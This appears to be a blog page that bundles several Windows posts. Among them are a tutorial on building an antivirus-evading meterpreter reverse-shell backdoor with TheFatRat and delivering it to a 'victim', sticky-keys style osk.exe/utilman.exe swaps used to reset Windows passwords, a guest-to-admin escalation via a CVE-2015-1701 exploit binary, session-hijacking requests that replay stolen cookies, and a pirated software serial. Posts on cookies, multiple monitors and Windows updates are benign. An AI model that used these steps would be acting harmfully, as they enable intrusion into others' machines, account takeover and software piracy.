Showing posts with label WINDOWS. Show all posts
Showing posts with label WINDOWS. Show all posts

How to set password to any application in PC - App Lock for PC


Hello friends,I am going to tell you a trick to make your installed PC software's password protected. It means whenever anyone open any software installed in your PC then he/she will be asked for a password if he/she does not know the password then they can not use the software.

There are two easy ways:  1st one is a shareware program. And 2nd one is a freeware program


1]:
STEP 1: Download Password Door and install it in your PC.
STEP 2: After installing it in your PC, open the app and navigate to the app that which you want to password protect.
STEP 3:  Now enter the PC password to it when it prompted. That's all. now when ever any user wants to open the selected app in your PC, it will prompt for the password.

Note: Even the app cannot be uninstalled from your PC without knowing the password to play any trick.





STEP 1:  Download the simple program and keep it some where in your PC.
STEP 2: Now open Empathy.exe after extracting zip file and navigate and click on  a program to protect.
STEP 3: Now you will see programs installed in windows and on which you can set password. Select the program from the list and make it password protect.
Note: Keep the software Empathy in a safe place. Unregistered version only allows you to use single character passwords. To register your copy, hold the Shift key on your keyboard and press the Help button. In the registration window that will show, enter the following information. Empathy does not support 64-bit EXE files, but can be used to protect 32-bit EXE files running on 64-bit operating systems.

Name: Registered User
Serial number: A1CA013839CDB4

Share:

Beginner Guide to Understand Cookies and Session Management


From Wikipedia and w3schools

Cookie

Cookie is a small piece of data sent by a server to a browser and stored on the user’s computer while the user is browsing. Cookies are produced and shared between the browser and the server using the HTTP Header.
It Allows server store and retrieve data from the client, It Stored in a file on the client side and maximum size of cookie that can stored is limited upto 4K in any web browser. Cookies have short time period because they have expiry date and time as soon as browser closed.
Example- when you visit YouTube and search for Bollywood songs, this gets noted in your browsing history, the next time you open YouTube on your browser, the cookies reads your browsing history and you will be shown Bollywood songs on your YouTube homepage
Creating cookie
The setcookie() function is used for the cookie to be sent along with the rest of the HTTP headers.
When developer creates a cookie, with the function setcookie, he must specify atleast three arguments. These arguments are setcookie(namevalueexpiration);
Image Source Goolge
Cookie Attributes
  1. Name: Specifies the name of the cookie
  2. Value: Specifies the value of the cookie
  3. Secure: Specifies whether or not the cookie should only be transmitted over a secure HTTPS connection. TRUE indicates that the cookie will only be set if a secure connection exists. Default is FALSE
  4. Domain: Specifies the domain name of the cookie. To make the cookie available on all subdomains of example.com, set domain to “example.com”. Setting it to www.example.com will make the cookie only available in the www subdomain
  5. Path: Specifies the server path of the cookie. If set to “/”, the cookie will be available within the entire domain. If set to “/php/”, the cookie will only be available within the php directory and all sub-directories of php. The default value is the current directory that the cookie is being set in
  6. HTTPOnly: If set to TRUE the cookie will be accessible only through the HTTP protocol (the cookie will not be accessible by scripting languages). This setting can help to reduce identity theft through XSS attacks. Default is FALSE
  7. Expires: Specifies when the cookie expires. The value: time ()+86400*30, will set the cookie to expire in 30 days. If this parameter is omitted or set to 0, the cookie will expire at the end of the session (when the browser closes). Default is 0

Necessity of Cookies

Cookies can be used for various purposes –
  • Identifying Unique Visitors.
  • Http is a stateless protocol; cookies permit us to track the state of the application using small files stored on the user’s computer.
  • Recording the time each user spends on a website.
Type of cookies
Session Cookie
This type of cookies dies when the browser is closed because they are stored in browser’s memory. They’re used for e-commerce websites so user can continue browsing without losing what he put in his cart. If the user visits the website again after closing the browser these cookies will not be available. It is safer, because no developer other than the browser can access them.
Persistent Cookie
These cookies do not depend on the browser session because they are stored in a file of browser computer. If the user closes the browser and then access the website again then these cookies will still be available. The lifetime of these cookies are specified in cookies itself (as expiration time). They are less secure.
Third Party Cookie
A cookie set by a domain name that is not the domain name that appears in the browser address bar these cookies are mainly used for tracking user browsing patterns and/or finding the Advertisement recommendations for the user.
Secure Cookie
A secure cookie can only be transmitted over an encrypted connection.  A cookie is made secure by adding the secure flag to the cookie. Browsers which support the secure flag will only send cookies with the secure flag when the request is going to a HTTPS page.
HTTP Only Cookie
It informs the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly prohibited. This is an important security protection for session cookies.
Zombies Cookie
A zombie cookie is an HTTP cookie that is recreated after deletion. Cookies are recreated from backups stored outside the web browser’s dedicated cookie storage.

Sessions

PHP session: when any user made any changes in web application like sign in or out, the server does not know who that person on the system is. To shoot this problem PHP session introduce which store user information to be used across several web pages.
Session variables hold information about one single user, and are exist to all pages in one application.
Example: login ID user name and password.

Session ID

PHP code generates a unique identification in the form of hash for that specific session which is a random string of 32 hexadecimal numbers such as 5f7dok65iif989fwrmn88er47gk834 is known as PHPsessionID.
session ID or token is a unique number which is used to identify a user that has logged into a website. Session ID is stored inside server, it is assigns to a specific user for the duration of that user’s visit (session). The session ID can be stored as a cookie, form field, or URL.
Explanation:
Now let’s have a look over this picture and see what this picture says:
In given picture we can clearly see there are three components inside it: HTTP ClientHTTP server and Database(holding session ID).
Step1: client send request to server via POST or GET.
Step2: session Id created on web server. Server save session ID into database and using set-cookie function send session ID to the client browser as response.
Step3: cookie with session ID stored on client browser is send back to server where server matches it from database and sends response as HTTP 200 OK.
Image Source: Google Images

Session hijacking

As we know different users have unique session ID when an attacker sniff the session via man-in-middle attack or via XSS and steal session ID or session token this is called session hijacking. When attacker sends the stealing session ID to web server, server match that ID from database stored session ID. If they both matched to each other then the server reply with HTTP 200 OK and attacker get successfully access without submitting proper Identification.
Example 1: Using the session cookies issued to the user by the server.
For example, on any website an official user logged-in, and the server has generate a session cookie SESSION-TOKEN for that user. If the SESSION-TOKEN is the cookie which recognized the session of that user, the attacker can steal the SESSION-TOKEN cookie value to login as the legitimate user. The attacker can perform a cross-site scripting or other technique to steal the cookie from the victim’s browser.
Let’s suppose the attacker steals the cookie PHPSESSID=user-raj-logged-in-2341785645. Now, he can use the cookie with the following request to post a status (HACKED!!!!!!) in the victim’s home page:
 POST /home/post_status.php HTTP/1.1
Host: www.Facebook.com
Cookie: PHPSESSID=user-raj-logged-in-2341785645
Content-Length:38
Content-Type:application/x-www-form-urlencoded
 Status= HACKED!!!!!&Submit=submit
The attacker uses the cookie subjected to the authorized user, and gains control on the user’s session.
Example 2: Guessing the cookie values of users if a complicated algorithm is not used for the cookie generation.
For example, consider a website uses an algorithm to generate cookies for the users. If the user name is “raj”, then the cookie generated for the user could be “LOGINID=-772017- qszbik”. In this case, the algorithm used to generate the cookie can be as follows:
First part of the cookie is the date i.e. 7/7/2017 and second part is the arrangement of the previous and next alphabet letter for each letter of the username “John” (i.e., the previous letter for r is “q” and the following letter is “s”). If the attacker is able to break the algorithm, he might estimate the cookie of users and hack their session.
  r=qs
  a=zb
  j=ik
If the attacker decide to hack the session of admin, he can make a cookie as LOGINID =772017- zbcelnhjmo, login to raj’s session and post a status on his account.
Cookie:LOGINID =772017- zbcelnhjmo
Content-Length:45
Content-Type:application/x-www-form-urlencoded
 Todays_status=I am hacked!!!!!!&Submit=submit
Session hijacking tutorial
For this tutorial I have targeted DVWA, here cookie name is dvwa Session.
Note: session ID for this page will change every time when we will close the browser.
Now capture the browser request using burp suite.
From given image we can see the cookie holds PHPSESSID P38kq30vi6arr0b321p2uv86k0; now send this intercepted data into repeater to observe its response.
In response you can see the highlighted data show set –cookie: dvwaSession =1 more over HTTP 200 OK response from server side.
According to developer each time a new sessionID will generate by server each time, but attacker sniff this session ID P38kq30vi6arr0b321p2uv86k0 for unauthorized login.
Next time we receive another session id when data is intercepted through burp suite i.e. PHPSESSID= gutnu601knp4qsrgfdb4ad0te3, again send this intercepted data into repeater to observe its response.
But before we perceive its response, replace new PHPSESSID from old PHPSESSID.
From given image you can observe we have replaced the SESSION ID and then generate its response in which set –cookie: dvwaSession =6 and HTTP 200 OK response from server side.  
Now change the value inside intercepted data and then forward this request to the server.

Session Vs cookies

SessionCookies
Data are stored on ServerData are stored in Client’s Browser
Sessions Data are more secure because they never travel on every HTTPRequestTravel with each and Every HTTP request
You can store Objects (Store Large Amount of Data)You can store strings type (Max File Size 4 kb)
Session Cannot be used for Future ReferenceCookies are mostly used for future reference

Share:

Hack Remote Windows 10 PC using TheFatRat


TheFatRat is an easy tool for generate backdoor with msfvenom ( part of metasploit framework ) and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on a windows host Program to create a C program after it is compiled that will bypass most AV
First, to install thefatrat we type the following command on terminal:
git clone https://github.com/Screetsec/TheFatRat.git
Once the cloning is done, go to the installed directory of fatrat and open it in terminal and type the following command to start it:
 ./fatrat
It will show you many options now select option which is to CREATE BACKDOOR WITH MSFVENOM.
Now it will give a list of options to choose the format of the backdoor which you have to choose as per your requirements and need. To create a windows executable as a backdoor choose option 2.
Now enter the LHOST IP i.e. your system IP and LPORT i.e. the port you want the reverse connection on your i.e. attacker system. In my case the LHOST is 192.168.0.104 and LPORT is 4444.
And then exit the script by selecting y when asked
Now the generated backdoor will be present in the output directory.
Now use any trick up your sleeve to transport the backdoor to the victim and set up reverse handler on metasploit with the following commands on the msf terminal-
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.104 (the attacker system IP)
set lport 4444
exploit
Now as soon as the backdoor is executed on the victim’s machine you will get a meterpreter shell as you can see in my case.

For More Details Visit here

Share:

2 Ways to Hack Windows 10 Password Easy Way

Start your computer and enter into Bios Setup. Change your boot preferences to boot from CD /DVD. Click on Next
Now select the “Repair your computer” option from the lower left-hand corner.
Then click on Troubleshoot option.
Then click on advanced options.
Now click on command prompt
Then you’ll copy the command prompt executable (cmd.exe) over top of the On Screen keyboard executable
Copy d:\windows\system\32\cmd.exe d:\windows\system32\osk.exe
Now you can reboot the PC.
Resetting the Password
Once you get to the login screen, click on On-Screen Keyboard, and you’ll see an administrator mode command prompt.
Now to reset the password—just type the following command, replacing the username and password with the combination you want:
Syntax : net user account.name *
Example: net user raj * and hit enter. Set any password for that account.
Second Method
Start your computer and enter into Bios Setup. Change your boot preferences to boot from CD /DVD. Click on Next
Press SHIFT + F10 to open a command prompt
Then you’ll copy the command prompt executable (cmd.exe) over top of utility manager executable
Copy d:\windows\system\32\cmd.exe d:\windows\system32\utilman.exe
Now you can reboot the PC.
On the Windows 10 sign-in page, click the Utility Manager icon
Now to reset the password—just type the following command, replacing the username and password with the combination you want:
Syntax : net user account.name *
Example: net user raj * and hit enter. Set any password for that account.

Share:

Hack Windows 7 Password from Guest Account



Now here type net user command to change the admin password but it will show you the error “Access is denied”
Download CVE 2015-1701 from here and unzip in your Pc. Then go to the compiled folder in CVE Master. Here you will find 2 exe files for 32-bit user and 64-bit user(in my case I’m using 64-bit user).
Now run Taihou64.exe, it will open a command prompt with admin priveleges. Now you can change the password using net user command. Example is given below:
Syntax:
net user (username) *   then press enter
Note: This trick works only on Windows7(all versions) not available for Windows8 and Windows10 ye
Share:

How to Use Multiple Monitors to Be More Productive

Many people swear by multiple monitors, whether they’re computer geeks or just people who need to be productive. Why use just one monitor when you can use two or more and see more at once?
Additional monitors allow you to expand your desktop, getting more screen real estate for your open programs. Windows makes it very easy to set up additional monitors, and your computer probably has the necessary ports.

Why Use Multiple Monitors?

multiple-monitors-in-use
Multiple monitors give you more screen real estate. When you hook multiple monitors up to a computer, you can move your mouse back and forth between them, dragging programs between monitors as if you had an extra-large desktop. That way, rather than Alt+Tabbing and task switching to glance at another window, you can just look over with your eyes and then look back to the program you’re using.
Some examples of use cases for multiple monitors include:
  • Coders who want to view their code on one display with the other display reserved for documentation. They can just glance over at the documentation and look back at their primary workspace.
  • Anyone who needs to view something while working. Viewing a web page while writing an email, viewing another document while writing an something, or working with two large spreadsheets and having both visible at once.
  • People who need to keep an eye on information, whether it’s email or up-to-date statistics, while working.
  • Gamers who want to see more of the game world, extending the game across multiple displays.
  • Geeks who just want to watch a video on one screen while doing something else on the other screen.
If you just have a single monitor, you can also use the Snap feature to quickly place multiple Windows applications side by side. But how useful this feature is depends on your monitor’s size and resolution. If you have a large, high-resolution monitor, it will allow you to see a lot. But for many monitors (especially those on laptops), things will seem very cramped. That’s where dual monitors can come in handy.

Hooking Up Multiple Monitors

vga-port-next-to-dvi-port
Hooking up an additional monitor to your computer should be very simple. Most new desktop computers come with more than one port for a monitor—whether DisplayPort, DVI, HDMI, the older VGA port, or a mix. Some computers may include splitter cables that allow you to connect multiple monitors to a single port.
Most laptops also come with ports that allow you to hook up an external monitor. Plug a monitor into your laptop’s DisplayPort, DVI, or HDMI port and Windows will allow you to use both your laptop’s integrated display and the external monitor at once (see the instructions in the next section).


This all depends on the ports your computer has and how your monitor connects. If you have an old VGA monitor lying around and you have a modern laptop with only DVI or HDMI connectors, you may need an adapter that allows you to plug your monitor’s VGA cable into the new port. Be sure to take your computer’s ports into account before you get another monitor for it.

Configuring Multiple Monitors in Windows

Windows makes using multiple monitors easy. Just plug the monitor into the appropriate port on your computer, and Windows should automatically extend your desktop onto it. You can now just drag and drop windows between monitors. However, Windows may mirror your displays instead, showing the same thing on each one by default If that’s the case, you can easily fix that.
To quickly choose how you want to use your display on Windows 8 or 10, press Windows+P on your keyboard. A sidebar will appear and you’ll be able to quickly choose a new display mode. You’ll probably want to use the Extend option to get more room for windows on your desktop, unless you’re giving a presentation, but here’s what all the options do:
  • PC Screen only: Windows will only use your primary monitor, and any additional monitors will be black.
  • Duplicate: Windows will show the same image on all monitors. This is useful if you’re giving a presentation and want the same image on your primary monitor and the secondary display, for example.
  • Extend: Windows will enlarge and extend your desktop, giving you another screen to work with. This is the option you’ll want if you’re using an additional monitor for additional PC screen space.
  • Second screen only: Windows will turn off your primary display and only use the secondary display.
To configure your displays on Windows 10, right-click your desktop and select “Display Settings” or navigate to Settings > System > Display. Click the “Identify” button to see the each display’s number appear on the display, and then drag and drop the displays so Windows understands how they’re physically positioned. Display number one is your primary display. Click “Apply” to save any changes you make.
If Windows didn’t detect all your connected displays automatically, click the “Detect” button here.


You can click each connected display and choose an appropriate scaling level for it, which is useful if one display is a high-DPI display and one isn’t. You can also choose separate display orientations—for example, perhaps one display is on its side and you need to rotate the picture.
Under Multiple displays, you can choose how you want to use your display. These are the same options you can access by pressing Windows+P.
You can also change which display is your primary one from here. Select the display you want to be your primary one at the top of the window and then click “Make this my main display” under Multiple displays.


Windows 8 and 10 also allow you to extend your Windows taskbar across multiple monitors. To activate this feature on Windows 10, head to Settings > Personalization > Taskbar and enable the “Show taskbar on all displays” option. On Windows 8, right-click the taskbar and select “Properties.” Activate the “Show taskbar on all displays” option here.
You can also choose how you want taskbar buttons to appear. For example, you can choose whether a window’s buttons should appear in the taskbar only on that window’s display or on all displays.
On Windows 7, right-click your Windows desktop and select “Screen resolution”.  Click the “Identify” button to see which monitor is which and drag and drop them in this window so Windows understands how they’re physically positioned.
Choose an option from the Multiple displays box. The Extend option extends your desktop onto an additional monitor, while the other options are mainly useful if you’re using an additional monitor for presentations. For example, you could mirror your laptop’s desktop onto a large monitor or blank your laptop’s screen while it’s connected to a larger display.
configure-multiple-monitor-setting-on-windows-7
Windows 7 doesn’t have a multi-monitor taskbar feature built-in, as Windows 8 and 10 do. Your second monitor won’t have a taskbar. To extend your taskbar onto an additional monitor, you’ll need a third-party utility like the free and open-source Dual Monitor Taskbar.

Going Further with DisplayFusion



Multiple monitors make things a lot easier right out of the gate—but you don’t have to stop there. You can set different wallpapers for each monitor, either through a hidden feature in Windows, or using a third-party tool like the DisplayFusion (which has a free version with some features, and a $25 version with lots of features). DisplayFusion also offers customizable buttons and shortcut for moving windows between monitors, the ability to “snap” windows to the edge of either display, dual-monitor screesavers, and lots more. If you’re using multiple monitors, it’s a must-have program.
Share:

How to turn off Windows 10 Auto Updates



screenshot.1
Windows 10 PCs automatically check for updates and install any updates they find. You can take some control over this and have Windows 10 install updates on your schedule, but these options are hidden. Windows Update really wants to automatically update on Windows 10.
Professional, Enterprise, and Education editions of Windows 10 have access to group policy and registry settings for this, but even Home editions of Windows 10 give you a way to stop updates from automatically downloading.

Prevent Automatic Downloading of Updates on a Specific Connection



When you set a connection as “metered,” Windows 10 won’t automatically download updates on it. Windows 10 will automatically set certain types of connections — cellular data connections, for example — as metered. However, you can set any connection like as a metered connection.
So, if you don’t want Windows 10 automatically downloading updates on your home network connection, just set it as a metered connection. Windows 10 will automatically download updates when you connect your device to an unmetered network, or when you set the network it’s connected to as unmetered again. And yes, Windows will remember this setting for each individual network, so you can disconnect from that network and reconnect all you like.
Do you have an Internet connection with limited data? Just mark it as metered and Windows 10 won’t automatically download updates on it. If your connection offers unlimited downloads at a specific time — for example, during the middle of the night — you could mark the connection as unmetered occasionally at these times to download updates and mark it as metered after the updates are downloaded.


To change this option, open the Settings app, head to Network & Internet > Wi-FI, and click “Manage Known Networks”. Choose your Wi-Fi network and click “Properties”. From there, enable the “Set as metered connection” option. This option only affects the Wi-Fi network you’re currently editing, but Windows will remember this setting for each individual Wi-Fi network on which you change it. (If you haven’t gotten the Anniversary Update yet, this option will be in Settings > Network & Internet > Advanced Options.)
This option isn’t available for Ethernet networks, but you can set your Ethernet connection as metered using a registry hack.
screenshot.2
After enabling this option, Windows Update will say “Updates are available. We’ll download the updates as soon as you connect to Wi-Fi, or you can download the updates using your data connection (charges may apply.)” By marking a connection as metered, you’ve tricked Windows into thinking it’s a mobile data connection–for example, you might be tethering your PC to your smartphone. You can click the Download button to download and install updates at your leisure.
screenshot.3

Stop Windows Update From Automatically Rebooting Your Computer



So maybe you don’t mind the automatic downloads, but you just don’t want Windows to restart while you’re in the middle of something. Windows 10 is okay about this, since it lets you set a 12 hour window called “Active Hours” in which it won’t automatically reboot.
To set Active Hours, head to Settings > Update & Security > Windows Update. Click or tap “Change Active Hours” under Update Settings. From there, you’ll set the times you don’t want Windows to automatically restart.
You can also override those active hours to schedule certain reboots when an update is ready. 

Prevent Windows Update From Installing Specific Updates and Drivers



If Windows 10 insists on installing a specific update or driver that’s causing problems, you can prevent Windows Update from installing that particular update. Microsoft doesn’t provide a built-in way to block updates and drivers from automatically being downloaded, but it does offer a downloadable tool that can block updates and drivers so Windows won’t download them. This gives you a way to opt out of specific updates–uninstall them and “hide” them from being installed until you unhide them.

Use Group Policy to Disable Automatic Updates (Professional Editions Only)



Editor’s Note: This option, while it still exists, seems to no longer work in the Anniversary Update for Windows 10, but we’ve left it here in case anyone wants to try it. Proceed at your own risk.
You should really consider leaving automatic updates enabled for security reasons. But, there is an option that will let you choose how updates are installed on your own schedule, but it’s buried in Group Policy. Only Professional, Enterprise, and Education editions of Windows 10 have access to the Group Policy editor. To access the group policy editor, press Windows Key + R, type the following line into the Run dialog, and press Enter:
gpedit.msc
Navigate to Computer Configuration\Administrative Templates\Windows Components\Windows Update.
Locate the “Configure Automatic Updates” setting in the right pane and double-click it. Set it to “Enabled,” and then select your preferred setting. For example, you can choose “Auto download and notify for install” or “Notify for download and notify for install.” Save the change.
Visit the Windows Update pane, click “Check for updates,” and then select “Advanced options.” You should see your new setting enforced here. You’ll also see a note saying “Some settings are managed by your organization,” informing you that these options can only be changed in Group Policy.
To disable this later, go back to the Group Policy editor, double-click the “Configure Automatic Updates” setting, and then change it from “Enabled” to “Not configured.” Save your changes, visit the Windows Update pane again, click “Check for updates,” and then select “Advanced options.” You’ll see everything change back to the default setting. (Windows Update only seems to notice the setting change after you click “Check for updates.”)

Use the Registry to Disable Automatic Updates (Professional Editions Only)

Editor’s Note: This option, while it still exists, seems to no longer work in the Anniversary Update for Windows 10, but we’ve left it here in case anyone wants to try it. Proceed at your own risk.
This setting can be configured in the registry, too. This registry hack does exactly the same thing as the above Group Policy setting. However, it also only seems to work on Professional editions of Windows 10.
Download our Disable Automatic Updates on Windows 10 registry hack and double-click one of the included .reg files to make Windows Update notify for download and notify for install, auto download and notify for install, or auto download and schedule the install. There’s also a .reg file that will delete the registry value the other files create, allowing you to go back to the default settings. This only worked when we tried it on Windows 10 Pro, not Home.
After changing this option, visit the Windows Update pane in the Settings app and click “Check for updates.” You can then click “Advanced options” and you’ll see your new setting here. (You have to perform a check for updates before Windows Update notices your changed setting.)
If you’d like to do this yourself, the exact setting you’ll need to change is under HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU — you’ll need to create the last few keys there. Create a DWORD value named “AUOptions” under the AU key and give it one of the following values:
00000002 (Notify for download and notify for install)
00000003 (Auto download and notify for install)
00000004 (Auto download and schedule the install)

There’s another “trick” making the rounds for this. It involves disabling the Windows Update system service in the Windows services administration tool. This isn’t a good idea at all, and will prevent your computer from receiving even crucial security updates. While it would be nice if Microsoft offered some more choice of when to install updates, you shouldn’t opt out of security updates entirely. To prevent Windows from automatically downloading updates on any PC, just set its connection as metered.
Share:

GET LATEST UPDATE by EMAIL